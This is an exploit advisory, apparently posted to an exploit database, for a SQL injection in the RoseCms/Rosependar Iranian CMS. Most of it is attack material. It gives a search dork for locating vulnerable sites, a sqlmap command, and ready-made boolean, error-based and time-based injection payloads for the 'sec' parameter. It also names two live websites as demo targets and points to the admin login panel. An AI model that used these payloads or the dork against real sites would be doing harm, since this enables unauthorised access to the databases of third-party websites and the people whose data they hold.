Rosependar IRANIAN CMS SQL injection

2020.02.27
us S I R M A X (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Powered By RoseCms" inurl:sec=

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-# # Exploit Title: Rosependar IRANIAN CMS SQL injection # Date: 2020-02-26 # Exploit Author: S I R M A X # Vendor Homepage: https://www.rosependar.ir/ # Dork: intext:"Powered By RoseCms" inurl:sec= # Version: All Version # Tested on: win,linux ================================================================================= [SQL injection] [+] (Vulnerability = Sql injection ) Storm Security Team of IRan [+] parameter = sec & cat ================================================================================= [+] Sqlmap: [-] sqlmap -u "http://victim.com/[PATH]&sec=" [#] Testing Method: [+] - boolean-based blind [+] - error-based [+] - time-based blind ================================================================================= ||||||||||||||||||||||| Parameter: sec (GET) || ||||||||||||||||||||||| Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=major/41&mode=branch&sec=109' AND 5547=5547 AND 'MmrR'='MmrR -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=major/41&mode=branch&sec=109' AND (SELECT 8985 FROM(SELECT COUNT(*),CONCAT(0x7162717071,(SELECT (ELT(8985=8985,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xaBp'='xaBp -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=major/41&mode=branch&sec=109' AND (SELECT 8166 FROM (SELECT(SLEEP(5)))BldJ) AND 'wptR'='wptR ================================================================================= Demo: [+] http://www.filand.ir/?page=major/41&mode=branch&sec=[SQL] [+] http://www.kaci.ir/?page=major/8&tp=1&cat=[SQL] ================================================================================= [#] The admin and user login panel is one admin panel => victim.com/index.php?page=major/19 ================================================================================= [=] T.me/Sir_Max #-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top